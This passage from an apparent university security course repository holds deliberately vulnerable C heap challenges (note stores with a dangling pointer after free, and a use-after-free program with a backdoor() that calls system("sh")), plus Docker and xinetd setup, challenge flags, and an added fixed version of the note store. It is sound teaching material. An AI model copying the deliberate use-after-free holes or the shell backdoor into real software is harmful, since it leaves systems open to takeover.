        puts( "No such note!" );
        return;
    }

    if( notes[idx].is_freed ){
        puts( "Double free! Bad hacker :(" );
        _exit(-1);
    }

    free( notes[idx].data );
    notes[idx].is_freed = 1;
}


void menu(){
    puts( "1. Add a note" );
    puts( "2. List notes" );
    puts( "3. Delete a note" );
    puts( "4. Exit" );
    puts( "> " );
}


int main(){

    init();

    while(1){
        menu();

        int n = read_int();

        switch( n ){
            case 1:
                add();
                break;
            case 2:
                list();
                break;
            case 3:
                delete();
                break;
            default:
                puts( "Invalid choice." );
                break;
        }
    }

    return 0;
}

--------------------------------------------------------------------------------
/week3/src/note.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#define MAX 10


void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}


uint64_t read_long(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atol( buf );
}


char* notes[MAX];

void add(){
    for( int i = 0 ; i < MAX ; ++i ){
        if( !notes[i] ){
            printf( "Size: " );
            uint64_t size = read_long();

            notes[i] = malloc( size );

            printf( "Note: " );
            read( 0 , notes[i] , size - 1 );

            puts( "Done!" );
            return;
        }
    }
    puts( "Full!" );
}


void show(){
    printf( "Which note do you want to show?\nIndex: " );
    uint64_t idx = read_long();

    if( idx >= MAX ){
        puts( "Invalid index." );
        return;
    }

    if( notes[idx] ){
        printf( "Note %d:\n%s\n" , idx , notes[idx] );
    }
    else{
        puts( "No such note!" );
    }
}


void delete(){
    printf( "Which note do you want to delete?\nIndex: " );
    uint64_t idx = read_long();

    if( idx >= MAX ){
        puts( "Invalid index." );
        return;
    }

    if( notes[idx] ){
        free( notes[idx] ); // dangling pointer, vulnerable!
        // notes[idx] = NULL; // The proper way
    }
    else{
        puts( "No such note!" );
    }
}


void menu(){
    puts( "1. Add a note" );
    puts( "2. Show a note" );
    puts( "3. Delete a note" );
    puts( "4. Exit" );
    puts( "> " );
}


int main(){

    init();

    while(1){
        menu();

        uint64_t n = read_long();

        switch( n ){
            case 1:
                add();
                break;
            case 2:
                show();
                break;
            case 3:
                delete();
                break;
            default:
                puts( "Invalid choice." );
                break;
        }
    }

    return 0;
}

--------------------------------------------------------------------------------
/week3/src/t-note.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#define MAX 10


void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}


uint64_t read_long(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atol( buf );
}


char* notes[MAX];

void add(){
    for( int i = 0 ; i < MAX ; ++i ){
        if( !notes[i] ){
            printf( "Size: " );
            uint64_t size = read_long();

            notes[i] = malloc( size );

            printf( "Note: " );
            read( 0 , notes[i] , size - 1 );

            puts( "Done!" );
            return;
        }
    }
    puts( "Full!" );
}


void show(){
    printf( "Which note do you want to show?\nIndex: " );
    uint64_t idx = read_long();

    if( idx >= MAX ){
        puts( "Invalid index." );
        return;
    }

    if( notes[idx] ){
        printf( "Note %d:\n%s\n" , idx , notes[idx] );
    }
    else{
        puts( "No such note!" );
    }
}


void delete(){
    printf( "Which note do you want to delete?\nIndex: " );
    uint64_t idx = read_long();

    if( idx >= MAX ){
        puts( "Invalid index." );
        return;
    }

    if( notes[idx] ){
        free( notes[idx] ); // dangling pointer, vulnerable!
        // notes[idx] = NULL; // The proper way
    }
    else{
        puts( "No such note!" );
    }
}


void menu(){
    puts( "1. Add a note" );
    puts( "2. Show a note" );
    puts( "3. Delete a note" );
    puts( "4. Exit" );
    puts( "> " );
}


int main(){

    init();

    while(1){
        menu();

        uint64_t n = read_long();

        switch( n ){
            case 1:
                add();
                break;
            case 2:
                show();
                break;
            case 3:
                delete();
                break;
            default:
                puts( "Invalid choice." );
                break;
        }
    }

    return 0;
}

--------------------------------------------------------------------------------
/week3/src/uaf.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>



void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}

int read_int(){
    char buf[0x10];
    // glibc's fortified read(): the last argument is the buffer size the count is checked against
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atoi( buf );
}

void welcome_func(){
    puts( "Hello ~~~" );
}

void bye_func(){
    puts( "Bye ~~~" );
}

void menu(){
    puts( "1. add a box" );
    puts( "2. exit" );
    puts( ">" );
}

struct MessageBox{
    void (*welcome)();
    void (*bye)();
};

void backdoor(){
    system("sh");
}

int main(){

    init();

    struct MessageBox* msgbox = (struct MessageBox*) malloc( sizeof( struct MessageBox ) );

    msgbox->welcome = welcome_func;
    msgbox->bye = bye_func;

    msgbox->welcome();
    free( msgbox );

    int n = 3, size;
    char *msg;

    while( n-- ){
        printf( "Size of your message: " );
        size = read_int();

        msg = (char*) malloc( size );

        printf( "Message: " );
        read( 0 , msg , size );

        printf( "Saved message: %s\n" , msg );

        free( msg );
    }

    msgbox->bye();

    return 0;
}

--------------------------------------------------------------------------------
/week3/t-note/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m t-note
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/t-note
CMD ["/usr/sbin/xinetd","-dontfork"]

--------------------------------------------------------------------------------
/week3/t-note/share/flag:
--------------------------------------------------------------------------------
FLAG{Tcache_Perf0rm4nce_0r_Secur17y?}

--------------------------------------------------------------------------------
/week3/t-note/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/t-note/t-note

--------------------------------------------------------------------------------
/week3/t-note/share/t-note:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/t-note/share/t-note
--------------------------------------------------------------------------------
/week3/t-note/xinetd:
--------------------------------------------------------------------------------
service t-note
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/t-note/run.sh
    socket_type = stream
    protocol = tcp
    user = t-note
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week3/uaf/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:16.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m uaf
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/uaf
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week3/uaf/share/flag:
--------------------------------------------------------------------------------
FLAG{U5e_af7er_freeeeeeee_yeeeeeeee}
--------------------------------------------------------------------------------
/week3/uaf/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/uaf/uaf
--------------------------------------------------------------------------------
/week3/uaf/share/uaf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/uaf/share/uaf
--------------------------------------------------------------------------------
/week3/uaf/xinetd:
--------------------------------------------------------------------------------
service uaf
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/uaf/run.sh
    socket_type = stream
    protocol = tcp
    user = uaf
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
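A hardened version of the note store from note.c / t-note.c, added here as an example that is not part of the course repository: delete() frees and clears the slot, as the source's commented-out "proper way" line suggests, so a later show() or second delete() on that index can no longer touch freed memory. The store_* names and the MAX_NOTE size bound are this example's own assumptions.

```c
/* Added example, not course code: note store with the dangling-pointer defect fixed.
 * store_* names and MAX_NOTE are hypothetical; sample input in main() is constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX 10
#define MAX_NOTE 0x1000   /* assumed upper bound on one note's size */

static char *notes[MAX];

/* Shared validity check: idx is unsigned, so one comparison rejects
 * both "negative" and out-of-range values; a cleared slot is NULL. */
static int slot_ok(size_t idx) {
    return idx < MAX && notes[idx] != NULL;
}

/* Allocate the first free slot; returns its index, or -1 when the store
 * is full or the size is unusable (0 would make size - 1 wrap around). */
int store_add(size_t size, const char *data, size_t len) {
    if (size == 0 || size > MAX_NOTE) return -1;
    for (size_t i = 0; i < MAX; ++i) {
        if (notes[i]) continue;
        notes[i] = calloc(1, size);            /* zeroed: always NUL-terminated */
        if (!notes[i]) return -1;
        memcpy(notes[i], data, len < size - 1 ? len : size - 1);
        return (int)i;
    }
    return -1;
}

/* Returns the note text, or NULL for an empty or invalid slot. */
const char *store_show(size_t idx) {
    return slot_ok(idx) ? notes[idx] : NULL;
}

/* Free and clear in one step: the slot can be reused by store_add, but
 * the freed chunk is never reachable through the array again. */
int store_delete(size_t idx) {
    if (!slot_ok(idx)) return -1;
    free(notes[idx]);
    notes[idx] = NULL;
    return 0;
}

int main(void) {
    int i = store_add(32, "hello", 5);                 /* constructed input */
    printf("note %d: %s\n", i, store_show((size_t)i));
    store_delete((size_t)i);
    printf("after delete: %s\n", store_show((size_t)i) ? "live" : "gone");
    return 0;
}
```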